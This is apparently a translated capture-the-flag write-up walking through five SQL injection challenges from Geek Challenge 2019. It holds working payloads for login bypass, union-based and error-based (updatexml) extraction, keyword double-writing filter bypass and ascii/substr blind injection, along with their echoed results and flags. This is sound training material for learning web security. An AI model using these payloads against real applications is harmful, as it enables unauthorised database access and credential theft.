Geek challenge 2019-sql injection five questions PW

01、[ Geek challenge 2019]EasysQL
02、[ Geek challenge 2019]LovesQL
03、[ Geek challenge 2019]BabysQL
04、[ Geek challenge 2019]HardsQL
05、[ Geek challenge 2019]FinalsQL        

Pass-01

  The first question doesn't need to be too fancy. It's the universal password directly

payload:admin' or 1=1 -- qwe

 Pass-02

Topic tips Not in the current table Directly test the closure with universal password   

Prompt for successful login It shows that there is no problem with closure Then the following is to judge the contents of other tables

admin' or 1=1 -- +  // Judge whether it is closed correctly 

admin' order by [1,2,3,4] -- +  // Determine the field length    3 normal   4 Report errors    The length is 3

1' union select 1,2,3 -- +  // Judge the echo point    Echo point   by  2   3  

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- +   // The query table name 

 Echo results ：'geekuser,l0ve1ysq1'

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' -- +   // Query the column name 

 Echo results ：id,username,password

1' union select 1,2,group_concat(password) from l0ve1ysq1 where password like '%flag%' -- +    // Too much data   Price  where  like  Statement to directly export flag

 Echo results ：'flag{13ea6ec1-392d-4bed-9e4d-e6dbdf723b33}'

Pass-03

It's beginning to be tested Execute first Callback error Here's the picture

1=1 There is nothing ahead Here is or But there is no statement callback What he said about filtering should be filtering or

Here are some bypass

1. Case around  ( Unavailable )

2. Double writing bypasses （ You can use ）

3. || Replace with compilation symbols （ You can use ） 

You will find union What? Will also be filtered So I directly use double writing to bypass bypass Go around , The method is as follows ：

admin' oorr 1=1 -- + // Login successful 

admin' oorrder bbyy 3 -- +  // The length of the field is 3

// This question is too stupid    I didn't find it in the end flag  The data is actually written into other databases   Hard top   Check the database again 

admin1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata -- + // Query database name 

 Echo results ：information_schema,mysql,performance_schema,test,ctf,geek

admin1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="ctf" -- + // Look up the table    If you don't know which fields will be filtered   My solution is to go ahead admin The box of is input normally , The password writes the content into , If you are prompted 'Input your username and password'  There is nothing left after being filtered   Try it a little   ctf  Database name   Single guidance is not enough   Use double quotes 

 Echo results ：Flag

admin1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag' -- +   // List 

 Echo results ：flag

admin1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag -- +   // use   database.table_name  To call the database 

 Echo results ：flag{c320590e-cd73-466f-8253-07b7eb730eb2}


 The following is the query method that cannot find the database table 

admin1' ununionion seselectlect 1,2,group_concat(username) frfromom geekuser whwhereere username like '%flag%' -- +    //password Inside or The filtered  or Double writing doesn't work   I use... Directly  16 Turn into the system 

admin1' ununionion seselectlect 1,2,group_concat(id) frfromom b4bsql -- +

 Pass-04

Universal password test The hint caught me Probability regular matching to do detection Recommend first burpsuite Run fuzz See which statements can be used

It's filtered out and  |  if   sleep  substr ascii  So it can be seen that Blind injection is not enough lose sqlmap Also out  

or and updatexml No filtering   So here we use or coordination updatexml Explicit error injection can be realized

1'or(updatexml(1,concat('~',database(),'~'),1))#     // Look at the database name 
 Echo data ：~geek~

1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),'~'),1))#  // Query table   use like Substitution is equal to 
 Echo data ：~H4rDsq1~

1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),'~'),1))# // Query field 
 Echo data ：id,username,password

1'or(updatexml(1,concat('~',(select(password)from(H4rDsq1)where(username)like('%flag%')),'~'),1))#  // Query results 
 Echo data ：~flag{2efa684f-dfe0-4b71-ad7f-97'  // Not long enough  substr Can not use   Only use left and right Division 

1'or(updatexml(1,concat('~',(select(right(password,30))from(H4rDsq1)where(username)like('%flag%')),'~'),1))#
 Echo data ：~f-dfe0-4b71-ad7f-978dfbcdfad4}~'

 Two lines of stitching 
flag{2efa684f-dfe0-4b71-ad7f-97
            f-dfe0-4b71-ad7f-978dfbcdfad4}

 The result is ：flag{2efa684f-dfe0-4b71-ad7f-978dfbcdfad4}

Pass-05 

  Such as topic tips The injection method is SQL Blind note   Correct mystery code 12345 It's no use Tips 6 Pass on id=6  It's useless in the past The user name is a dead pervert   direct writing admin Were caught

It's hard to top after filtering the parentheses So here we give up the position injected in the edit box Turn around and come id The location of  

id=1^1  Tips  ERROR！！！

id=1^1^1 The page is normal So here the last one 1 Is where the statement is written

I tried it updatexml You can't Blind note sleep Time blind injection doesn't work however ascii and substr It can be used , And there are logical operation echo points

Payload:

(length(database())>1)  // Measure the length of the database   skip 
ascii(substr(database(),1,1))>1   // Measure the length of the database   skip 

(length((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))>1) // Table name length    The length is 16

ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),i,1))=s // lose burpsuite Running results   Variable i  Check for the above  16  Variable s by ascii The maximum length of is  128

 Table,  =>70 49 110 97 73 49 121 44 70 108 97 97 97 97 97 103 =>F1naI1y,Flaaaaag // Actually, I checked here before flaaag This table   The password is not in it at all   And the length is 5000 many   I vomited. 

(length((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')))>1)   // Measure field length    The length is 20

(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),i,1))=s)

 Table, =>105 100 44 117 115 101 114 110 97 109 101 44 112 97 115 115 119 111 114 100=>id,username,password

(length((select(group_concat(username))from(F1naI1y)))=50)  // The length is 50

(ascii(substr((select(group_concat(username))from(F1naI1y)),i,1))=s)

 Table, =>109 121 103 111 100 44 119 101 108 99 111 109 101 44 115 105 116 101 44 115 105 116 101 44 115 105 116 101 44 115 105 116 101 44 83 121 99 44 102 105 110 97 108 108 121 44 102 108 97 103 =>mygod,welcome,site,site,site,site,Syc,finally,flag  //  Here we use notepad++  matching \r\n  Replace with space 

(length((select(group_concat(password))from(F1naI1y)))=213)   See me cry   Run.   Just use burpsuite   Write python Always want to copy with others   The memory is not deep 

 Finally came out  cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{91a80fa0-b1ac-4a10-b36d-e605f80bd8f9}